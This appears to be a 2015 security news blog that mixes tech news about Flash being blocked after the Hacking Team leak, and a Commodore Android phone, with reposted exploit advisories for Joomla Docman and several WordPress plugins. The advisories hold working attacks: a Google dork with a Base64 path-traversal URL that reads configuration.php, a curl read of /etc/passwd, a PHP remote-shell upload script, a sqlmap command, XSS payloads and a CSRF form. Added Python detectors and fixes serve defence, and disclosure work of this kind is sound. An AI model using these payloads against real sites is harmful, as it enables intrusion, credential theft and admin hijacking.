
16 Jul 2015

Google Chrome also disables Flash: flaws discovered via Hacking Team

AFTER Firefox, Chrome too is disabling support for Adobe Flash, the popular video player that, following the attack on Hacking Team, has shown a series of flaws exploitable by hackers. "Flash is a walking corpse; it has had vulnerabilities for many years. We have to accept that it is a finished program," Matteo Flora, computer scientist and security expert, tells ANSA.

The deactivations on two widely used search engines such as Chrome and Firefox come a few days after statements by Facebook's head of security, Alex Stamos, who asked Adobe to discontinue Flash. Adobe, for its part, interviewed by the site The Register, explains that it is working to strengthen its defences.

"Flash survives by inertia, because it is still used by a good share of active users and because many sites that support it are technologically behind," Matteo Flora stresses. "It will leave the stage as HTML5 (the new Internet standard, ed.) gains more and more ground." According to the expert, moreover, the deactivations on Firefox and Chrome are a blow to Adobe's image "but not a direct economic loss, rather a transactional cost, a strategic repositioning on the market".

The storm over Flash is Steve Jobs's prophecy coming true: Apple's founder was notoriously opposed to the program because of its security problems and refused to allow it on the iPad and iPhone.

Source: http://www.repubblica.it/tecnologia/sicurezza/2015/07/15/news/anche_google_chrome_disabilita_flash-119137069

16 Jul 2015

Commodore PET returns as a nostalgia-powered Android phone

If the name "Commodore" conjures up images of clicking keyboards, beige boxes, and blinking command lines rather than buttery smooth ballads, this one's for you. Yes, that mainstay of '80s home computing is back, this time as a mobile phone. The Commodore PET—which shares its name with the iconic all-in-one computer released in 1977—might not run Commodore BASIC, but it does feature a customised version of Android 5.0 Lollipop, a 5.5-inch 1080p IPS display, and a pair of emulators for running old Commodore software.

OK, so the two Italian entrepreneurs behind the PET might be playing on nostalgia just a tad in order to sell a few smartphones, but at the very least it's powered by some respectable hardware. The PET sports an aluminium frame, complete with interchangeable polycarbonate covers, should the stock white appearance and Commodore logos not be quite to your taste (although, you might want to think about why you're buying a Commodore phone if that's the case).

The 5.5-inch 1080p IPS display sits behind a sturdy slab of Gorilla Glass 3, and is powered by a 1.7 GHz Mediatek 64-bit octa-core processor with ARM Mali T760 GPU, 3GB of RAM, and a large 3000mAh battery. There's a rear-facing camera complete with a 13-megapixel Sony sensor and bright f/2.0 aperture, while the front-facing 8-megapixel camera is equipped with an 80-degree wide-angle lens. The PET even supports dual-SIM 4G connectivity.

That's nothing the world hasn't seen done better in other smartphones before, though. What makes the PET special, according to its creators at least, is its custom version of Android. Yes, a custom version of Android is rarely something to get excited about, but at least with the PET it enables special versions of the VICE C64 emulator and the Uae4All2-SDL Amiga emulator.

Unfortunately, there's no word yet on exactly what's so special about these emulators, or if there'll be any pre-installed Commodore software to get started. Other custom functions include an implementation of Daydream—which lets you choose what information appears on the display during charging—and system gestures that let you interact with the phone by shaking it, flipping it, or waving at it.

Whether that's enough to sell a smartphone in a crowded market, Commodore branding or not, remains to be seen. After all, you can download Commodore emulators to pretty much any Android smartphone yourself and get in on the action without having to fork out for a new device. Given the trouble that the PET's creators have gone to in order to secure the Commodore trademark—which languished in obscurity after being handed over to a Dutch company two years ago—hopefully the final devices will sport more than just a logo and pair of emulators.

If you're still interested, the PET will be available in Italy, France, Poland and Germany later in July for around $300 (£191), which buys 16GB of storage with an included 32GB micro SD card. A 32GB version will sell for around $60 (£38) more. Oddly, despite launching in Europe, there's no official Euro price just yet, and no official launch date for the UK either.

Users can choose white, black, or classic beige colours, with green and blue arriving later. The phone's creators have promised to bring the PET to other parts of Europe, as well as America at a later date.

If you're not sure what all the fuss is about—i.e. you were born in the '90s—check out Ars' history of the Amiga, which includes the tale of how Commodore bailed out the ailing company in the '80s, and how the deal quickly turned sour. And if that's not enough, we also took a look at some of our favourite Commodore 64 software on its 30th anniversary back in 2012.

Official source: http://arstechnica.com/gadgets/2015/07/commodore-pet-returns-as-a-nostalgia-powered-300-android-phone/

16 Jul 2015

Joomla Docman Path Disclosure / Local File Inclusion

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"
 
# Xploit (FPD):
 
 Take a target and request the download script with an empty file parameter:
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 The page title will then contain the full server path (Full Path Disclosure).
 
# Xploit (LFD/LFI):
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LFD]
 
 Let's Xploit...
 
 First use the FPD Xploit to learn the target's path; then point the file parameter at the 'configuration.php' database configuration file and encode the path in Base64:
 
 ../../../../../../../target/www/configuration.php <= Not Ready
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !
 
 
And now we have the configuration file...
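Because dl2.php takes the requested path Base64-encoded in the `file` parameter, a plain grep for "../" in the access log misses this attack. The detector below is an added example (not part of the advisory) that decodes the parameter and flags traversal, absolute paths and the empty-parameter FPD probe; the log lines are constructed.

```python
"""Flag Docman dl2.php traversal and FPD probes in an access log.

Added example, not part of the advisory. The `file` parameter of
dl2.php is Base64-encoded, so this decoder flags a value that decodes
to a traversal or absolute path, and an empty value (the Full Path
Disclosure probe). The log lines below are constructed.
"""
import base64
import binascii
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined-log style.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jul/2015:10:01:02 +0000] "GET /components/com_docman/dl2.php?archive=0&file=ZG9jcy9yZXBvcnQucGRm HTTP/1.1" 200 5120
10.0.0.6 - - [13/Jul/2015:10:01:09 +0000] "GET /components/com_docman/dl2.php?archive=0&file= HTTP/1.1" 200 812
10.0.0.7 - - [13/Jul/2015:10:01:15 +0000] "GET /components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== HTTP/1.1" 200 1488
10.0.0.8 - - [13/Jul/2015:10:01:20 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
DRIVE_RE = re.compile(r"^[A-Za-z]:[\\/]")  # Windows absolute path


def decode_file_param(raw: str) -> Optional[str]:
    """Base64-decode the `file` value; None when it is not valid Base64."""
    # parse_qs turns a literal '+' into a space; restore it for Base64.
    try:
        data = base64.b64decode(raw.replace(" ", "+"), validate=True)
    except (binascii.Error, ValueError):
        return None
    return data.decode("utf-8", "replace")


def classify_request(url: str) -> Optional[str]:
    """Return a finding label for one request path, or None when benign."""
    parts = urlsplit(url)
    if not parts.path.endswith("/components/com_docman/dl2.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("file")
    if not values or values[0] == "":
        return "fpd-probe: empty file parameter"
    decoded = decode_file_param(values[0])
    if decoded is None:
        return "suspicious: file parameter is not valid Base64"
    segments = re.split(r"[\\/]", decoded)
    if ".." in segments:
        return "lfi: traversal to %r" % decoded
    if decoded.startswith("/") or DRIVE_RE.match(decoded):
        return "lfi: absolute path %r" % decoded
    return None


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, finding) pairs for every flagged log line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        label = classify_request(m.group(1))
        if label:
            findings.append((line.split(" ", 1)[0], label))
    return findings


if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(ip, finding)
```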


16 Jul 2015

WordPress Image Export 1.1 Arbitrary File Download

Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator.
Vulnerability:
The code in download.php does not check that the requested file lies within the uploaded-images directory, and line 8 unlinks the file after it has been sent. The script could therefore also be used to delete files from the WordPress directory if file permissions allow.
 
      1 <?php
      2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
      3         $file = $_GET['file'];
      4 
      5         header( 'Content-Type: application/zip' );
      6         header( 'Content-Disposition: attachment; filename="' . $file . '"' );
      7         readfile( $file );
      8         unlink( $file );
      9         
     10         exit;
     11 }
     12 ?>
CVEID: TBD
Exploit Code:
$ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135
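The check that download.php lacks, as an added example in Python rather than the plugin's PHP: resolve the request against the uploads directory and refuse anything outside it, and never unlink on the download path. The directory layout it runs against is constructed in a temp dir.

```python
"""Path containment check that download.php lacks.

Added example, not the plugin's code: download.php passes $_GET['file']
straight to readfile() and unlink(). resolve_download() shows the check
a safe version needs, and serve_download() reads without deleting.
The uploads/ layout is constructed in a temporary directory.
"""
import os
import tempfile
from typing import Optional


def resolve_download(uploads_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path of `requested` inside `uploads_dir`, or None.

    Rejects absolute paths (/etc/passwd), traversal (../wp-config.php) and
    symlinks pointing out of the uploads directory, because the test runs
    on the realpath of the target rather than on the raw string.
    """
    if not requested or "\x00" in requested:
        return None
    if os.path.isabs(requested):
        return None
    base = os.path.realpath(uploads_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath is the robust containment test; a startswith() check
    # would accept /var/www/uploads-private when base is /var/www/uploads.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def serve_download(uploads_dir: str, requested: str) -> Optional[bytes]:
    """Read the file the way readfile() would, without the unlink()."""
    path = resolve_download(uploads_dir, requested)
    if path is None:
        return None
    with open(path, "rb") as fh:
        return fh.read()


def build_demo_tree() -> str:
    """Constructed layout: uploads/photo.jpg plus a secret file outside uploads."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    with open(os.path.join(uploads, "photo.jpg"), "wb") as fh:
        fh.write(b"JPEGDATA")
    with open(os.path.join(root, "wp-config.php"), "wb") as fh:
        fh.write(b"<?php // secret")
    # A symlink inside uploads that points at the secret (skipped where unsupported).
    try:
        os.symlink(os.path.join(root, "wp-config.php"), os.path.join(uploads, "link.jpg"))
    except (OSError, NotImplementedError):
        pass
    return uploads


if __name__ == "__main__":
    uploads = build_demo_tree()
    for req in ["photo.jpg", "../wp-config.php", "/etc/passwd", "link.jpg"]:
        verdict = "allowed" if resolve_download(uploads, req) else "rejected"
        print("%r: %s" % (req, verdict))
```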


16 Jul 2015

WordPress Plotly 1.0.2 Cross Site Scripting

Details
================
Software: Plotly
Version: 1.0.2
Homepage: http://wordpress.org/plugins/wp-plotly/
Advisory report: https://security.dxw.com/advisories/stored-xss-in-plotly-allows-less-privileged-users-to-insert-arbitrary-javascript-into-posts/
CVE: CVE-2015-5484
CVSS: 6.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:P)
 
Description
================
Stored XSS in Plotly allows less privileged users to insert arbitrary JavaScript into posts
 
Vulnerability
================
This plugin allows users who do not have the unfiltered_html capability to insert JavaScript into posts/pages which gets executed by the browsers of other users.
On single sites, only Administrators have the unfiltered_html capability, and on multisite, only Super Admins have this capability. This means that e.g. malicious Admins on a multisite, or malicious Editors would be able to perform XSS attacks against other site users and visitors.
 
Proof of concept
================
 
Create a new post as a user (without the unfiltered_html capability)
Switch to text mode
Place this link on a line by itself: https://plot.ly/~a/'onerror='alert(1)'>
View the post
 
 
Mitigations
================
Upgrade to version 1.0.3 or later.
N.B. If all accounts are trusted, or all accounts have the unfiltered_html capability, then there is no issue.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report within 14 days.
 
Timeline
================
 
2015-06-04: Discovered
2015-07-09: Reported to vendor via the contact form on the Plotly Enterprise site
2015-07-09: Requested CVE
2015-07-10: Vendor responded and confirmed fixed in 1.0.3
2015-07-13: Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
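Why the PoC line works, and the two defences that stop it, as an added example (not the plugin's code): the quote in the URL ends the HTML attribute it is pasted into. The markup the plugin emits is assumed here to be an iframe with single-quoted attributes; the shape check and the escaping do not depend on that assumption.

```python
"""Validate and escape the plot.ly URL before it is turned into an embed.

Added example, not the plugin's code. embed_unsafe() mirrors the bug
(raw concatenation into an attribute); embed_safe() accepts only URLs of
the assumed plot.ly shape and HTML-escapes the value. iframe_attributes()
parses the result the way a browser would, to show which attributes end
up on the tag.
"""
import html
import re
from html.parser import HTMLParser
from typing import Dict, Optional
from urllib.parse import urlsplit

# Assumed shape of a plot.ly share link: /~<username>/<numeric plot id>
PLOT_PATH = re.compile(r"^/~[A-Za-z0-9_.-]+/\d+/?$")


def embed_unsafe(line: str) -> str:
    """Mirror of the bug: raw concatenation into a single-quoted attribute."""
    return "<iframe src='%s' width='600' height='400'></iframe>" % line.strip()


def embed_safe(line: str) -> Optional[str]:
    """Embed markup for a well-formed https://plot.ly/~user/<id> URL, else None."""
    url = line.strip()
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname != "plot.ly":
        return None
    if not PLOT_PATH.match(parts.path) or parts.query or parts.fragment:
        return None
    # quote=True turns ' into &#x27; and " into &quot;, so even a value that
    # slipped past the shape check could not terminate the attribute.
    escaped = html.escape(url, quote=True)
    return "<iframe src='%s' width='600' height='400'></iframe>" % escaped


class _IframeAttrs(HTMLParser):
    """Collect the attributes of the first iframe, as a browser would parse them."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: Dict[str, Optional[str]] = {}

    def handle_starttag(self, tag, attrs):
        if tag == "iframe" and not self.attrs:
            self.attrs = dict(attrs)


def iframe_attributes(markup: str) -> Dict[str, Optional[str]]:
    """Return the attribute map a parser sees on the iframe in `markup`."""
    parser = _IframeAttrs()
    parser.feed(markup)
    return parser.attrs


if __name__ == "__main__":
    poc = "https://plot.ly/~a/'onerror='alert(1)'>"   # the advisory's PoC line
    print("unsafe attributes:", iframe_attributes(embed_unsafe(poc)))
    print("safe result for PoC:", embed_safe(poc))
    print("safe result for real link:", embed_safe("https://plot.ly/~alice/42"))
```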


16 Jul 2015

WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection

Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible with iPhone and iPads. It also allows you to use it as a widget. You can also enable this Powerplay Gallery on your wordpress site by placing a code snippet in your template (.php) files. It shows a flash gallery for desktops and a touch-enabled version for iPad and iPhones.
Vulnerability:
1. Ability to create directories outside of the upload path by using ../:
Lines 56-59 of upload.php:
 
56 // Create target dir
57 if (!file_exists($targetDir)) {
58         @mkdir($targetDir);
59 }      
 
2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of upload.php don't verify what types of files are allowed or where they should be placed:
 
138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140         die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144         if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145                 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}');
146         }
147 
148         // Read binary input stream and append it to temp file
149         if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
151         }
152 } else {
153         if (!$in = @fopen("php://input", "rb")) {
154                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
155         }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159         fwrite($out, $buff);
160 }
 
3. SQL injection
Lines 131-135 of upload.php fail to handle user input appropriately, either by sanitizing or parameterizing it. Injection points are
any GET/POST to albumid or name.
 
131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` )
132           VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
133 
134           $wpdb->query($query);
135 
 
CVEID:
OSVDB:
Exploit Code:
<?php
/*Remote shell upload exploit for wp-powerplaygallery v3.3 */
/*Larry W. Cashdollar @_larry0
6/27/2015
albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
but you can enumerate these by using curl, and looking for redirect 301 responses:
e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
->301 exists else 404 doesn't.
shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/


  $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
  $file_name_with_full_path = '/var/www/shell.php';

  echo "POST to $target_url $file_name_with_full_path";
  $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);

  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL,$target_url);
  curl_setopt($ch, CURLOPT_POST,1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  $result=curl_exec ($ch);
  curl_close ($ch);
  echo "<hr>";
  echo $result;
  echo "<hr>";
?>
SQLi PoC:
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql
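The INSERT from lines 131-134, rebuilt in Python on sqlite3 as an added example (the plugin itself uses MySQL through $wpdb; this is not its code): the string-built form accepts a second row smuggled through albumid, while the fixed form validates albumid as an integer and binds every value with placeholders, which is what $wpdb->prepare() with %d/%s does in WordPress.

```python
"""Vulnerable versus parameterized form of the upload.php INSERT.

Added example, not the plugin's code. insert_vulnerable() mirrors the
concatenation on lines 131-132 of upload.php; insert_safe() is the fix.
The table prefix and the crafted albumid value are constructed.
"""
import sqlite3

PREFIX = "wp_"  # assumed table prefix, standing in for $wpdb->prefix
COLUMNS = ("(`category_id`, `title`, `description`, `price`, `thumb`, "
           "`image`, `status`, `order`, `creation_date`)")


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the pp_images table from the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE %spp_images (category_id INTEGER, title TEXT, "
        "description TEXT, price TEXT, thumb TEXT, image TEXT, "
        "status INTEGER, `order` TEXT, creation_date TEXT)" % PREFIX
    )
    return conn


def row_count(conn) -> int:
    return conn.execute("SELECT COUNT(*) FROM %spp_images" % PREFIX).fetchone()[0]


def insert_vulnerable(conn, albumid: str, name: str, resize: str = "thumb.jpg") -> int:
    """Mirror of the plugin's concatenation; returns the table's row count afterwards."""
    imgname = name.split(".")[0]          # the plugin's $imgname[0]
    query = ("INSERT INTO %spp_images %s VALUES (%s,'%s','%s','','%s','%s',1,'','NULL')"
             % (PREFIX, COLUMNS, albumid, imgname, imgname, resize, name))
    conn.execute(query)
    return row_count(conn)


def insert_safe(conn, albumid: str, name: str, resize: str = "thumb.jpg") -> int:
    """Integer-validate albumid and bind every value; returns the row count."""
    if not albumid.isdigit():
        raise ValueError("albumid must be a non-negative integer")
    imgname = name.split(".")[0]
    conn.execute(
        "INSERT INTO %spp_images %s VALUES (?,?,?,'',?,?,1,'','NULL')" % (PREFIX, COLUMNS),
        (int(albumid), imgname, imgname, resize, name),
    )
    return row_count(conn)


# Constructed payload: closes the first VALUES tuple and opens a second one
# whose remaining eight columns are supplied by the plugin's own tail.
INJECTED_ALBUMID = "1,'a','a','','','',1,'','NULL'),(99"

if __name__ == "__main__":
    conn = fresh_db()
    print("rows after vulnerable insert:", insert_vulnerable(conn, INJECTED_ALBUMID, "pic.jpg"))
    try:
        insert_safe(fresh_db(), INJECTED_ALBUMID, "pic.jpg")
    except ValueError as exc:
        print("safe version rejected the input:", exc)
```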


16 Jul 2015

WordPress Floating Social Bar 1.1.5 Cross Site Scripting

# Exploit Title: Floating Social Bar 1.1.5 XSS
# Date: 09-01-2015
# Software Link: https://wordpress.org/plugins/floating-social-bar/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
 
Everyone can access save_order().
 
File: floating-social-bar\class-floating-social-bar.php
 
add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) );
 
$_REQUEST['items'] is not escaped.
 
http://security.szurek.pl/floating-social-bar-115-xss.html
 
2. Proof of Concept
 
http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="><script>alert("XSS");</script>
 
XSS will be visible for admin:
 
http://wordpress-url/wp-admin/options-general.php?page=floating-social-bar
 
3. Solution:
 
Update to version 1.1.6


15 Jul 2015

Adobe promises Flash improvements after Firefox and Facebook snubs

Adobe has promised to do all it can to improve the security of its much-maligned Flash tool, in response to criticism from the new CIO of Facebook and to Mozilla blocking the tool from its Firefox browser.

In a blog post, Adobe said it was working hard to fix issues that have come to light since data was leaked from the servers of Italian surveillance software firm Hacking Team.

It went on to say that it was because Flash is so widely used it is naturally a target for hackers, but that it is confident it can maintain an adequate level of security for the product.

"Flash Player is one of the most ubiquitous and widely distributed pieces of software in the world, and as such, is a target of malicious hackers," the blog said.

"We are actively working to improve Flash Player security, and as we did in this case, will work to quickly address issues when they are discovered."

The comments come after Mozilla took the notable step of blocking Flash from its browser in light of security concerns that have come to light in the last ten days, after major flaws in Flash were uncovered in data taken from Hacking Team.

Mark Schmidt, head of Firefox support at Mozilla, confirmed that all versions of Flash up to the most recent 18.0.0.203 release have been added to the official Mozilla blocklist.

This came after the incoming chief security officer at Facebook, Alex Stamos, called for Adobe to announce an ‘end-of-life date’ for Flash given the problems it is causing.

“Even if 18 months from now, one set date is the only way to disentangle the dependencies and upgrade the whole ecosystem at once,” he added.

Adobe has issued two major updates for Flash since the flaws were revealed. The first patch fixed CVE-2015-5119. It was soon forced to issue a second patch for two further flaws, CVE-2015-5122 and CVE-2015-5123, as it explained in a post on its website.

"Critical vulnerabilities have been identified in Adobe Flash Player 18.0.0.204 and earlier versions for Windows, Macintosh and Linux," it said.

"Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system."

Adobe rates the flaws as critical and firms have been urged to upgrade as soon as possible. The firm also thanked researchers at FireEye and Trend Micro for uncovering the vulnerabilities.

The revelations are just the latest information to come to light since the hack. Other data revealed that the FBI is a customer of Hacking Team, and is reported to have spent $775,000 on the firm's software.

The revelations from the hack have not come as a huge surprise to those who have criticised Hacking Team in the past, and the firm has been labelled an "enemy of the internet" by Reporters Without Borders.

"Hacking Team describes its lawful interception products as 'offensive technology' and has been called into question over deliveries to Morocco and the United Arab Emirates," the organisation said.

"The company’s 'Remote Control System', called DaVinci, is able, it says, to break encryption on emails, files and internet telephony protocols."

The attackers behind the hack have not yet come to light, but they too were clearly keen to embarrass and discredit Hacking Team, not only releasing the data from its systems but defacing its Twitter account and posting company emails.

The firm’s bio on Twitter was changed to read: 'Developing ineffective, easy-to-pwn offensive technology to compromise the operations of the worldwide law enforcement and intelligence communities.'

The leaked information allegedly includes contracts the company signed with repressive governments such as in Sudan, Uzbekistan and Russia. Hacking Team had denied ever working with Sudan after a report in 2014 accused it of doing so.

Source: http://www.v3.co.uk/v3-uk/news/2416392/government-surveillance-software-firm-hacking-team-hit-by-hack-and-data-leak

13 Jul 2015

WordPress Twenty Fifteen 4.2.1 Cross Site Scripting

Information
--------------------
Advisory by Netsparker.
Name: DOM XSS Vulnerability in Twenty Fifteen WordPress Theme
Affected Software : WordPress
Affected Versions: 4.2.1 and probably below
Vendor Homepage : https://wordpress.org/ and https://wordpress.org/themes/twentyfifteen/
Vulnerability Type : DOM based Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-3429
Netsparker Advisory Reference : NS-15-007
 
Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.
 
Technical Details
--------------------
Proof of Concept URL for DOM XSS in WordPress:
 
http://example.com/wordpress/wp-content/themes/twentyfifteen/genericons/example.html#<img/src/onerror=alert(123)>
 
For more information on DOM based cross-site scripting vulnerabilities
read the following article:
https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/
 
Advisory Timeline
--------------------
22/04/2015 - First Contact
07/05/2015 - Vulnerability fixed
07/05/2014 - Advisory released
 
Solution
--------------------
Download WordPress version 4.2.2, which includes a fix for this vulnerability.
 
Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/
 
About Netsparker
--------------------
Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allow it to be dead accurate in reporting, hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com


13 Jul 2015

WordPress PictoBrowser 0.3.1 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in PictoBrowser Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9392
# Plugin Homepage: https://wordpress.org/plugins/pictobrowser-gallery/
# Version Affected: 0.3.1 (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: all text boxes, to name one - pictoBrowserFlickrUser
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attacks, meaning that if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do, e.g. by hijacking the admin's cookies.
 
# Steps to Reproduce: (POC):
After installing the plugin
1. Go to Settings -> PictoBrowser
2. Insert the payload "><script>alert(32)</script> in any/all of the text fields, update the options and see the XSS in action
3. Visit the settings page of this plugin any time later and you can see the script executing, as it is stored.
 
The plugin does not use any nonces and hence the same settings can be changed using a CSRF attack; the PoC code for this is below:
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=pictobrowser-gallery/options-page.php&updated=true" method="POST">
      <input type="hidden" name="stage" value="process" />
      <input type="hidden" name="pictoBrowserFlickrUser" value=" baby csrf" />
      <input type="hidden" name="pictoBrowserPicasaUser" value=" " />
      <input type="hidden" name="pictoBrowserWidth" value="hi" />
      <input type="hidden" name="pictoBrowserHeight" value="hi" />
      <input type="hidden" name="pictoBrowserBackground" value="hi" />
      <input type="hidden" name="pictoBrowserTransparency" value="hi" />
      <input type="hidden" name="pictoBrowserShowTitles" value="on" />
      <input type="hidden" name="pictoBrowserShowNotes" value="on" />
      <input type="hidden" name="pictoBrowserShowZoom" value="off" />
      <input type="hidden" name="pictoBrowserAutohide" value="on" />
      <input type="hidden" name="pictoBrowserInitScale" value="off" />
      <input type="hidden" name="pictoBrowserImagesize" value="medium" />
      <input type="hidden" name="pictoBrowserVAlign" value="mid" />
      <input type="hidden" name="Submit" value="Save Options »" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
#Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************
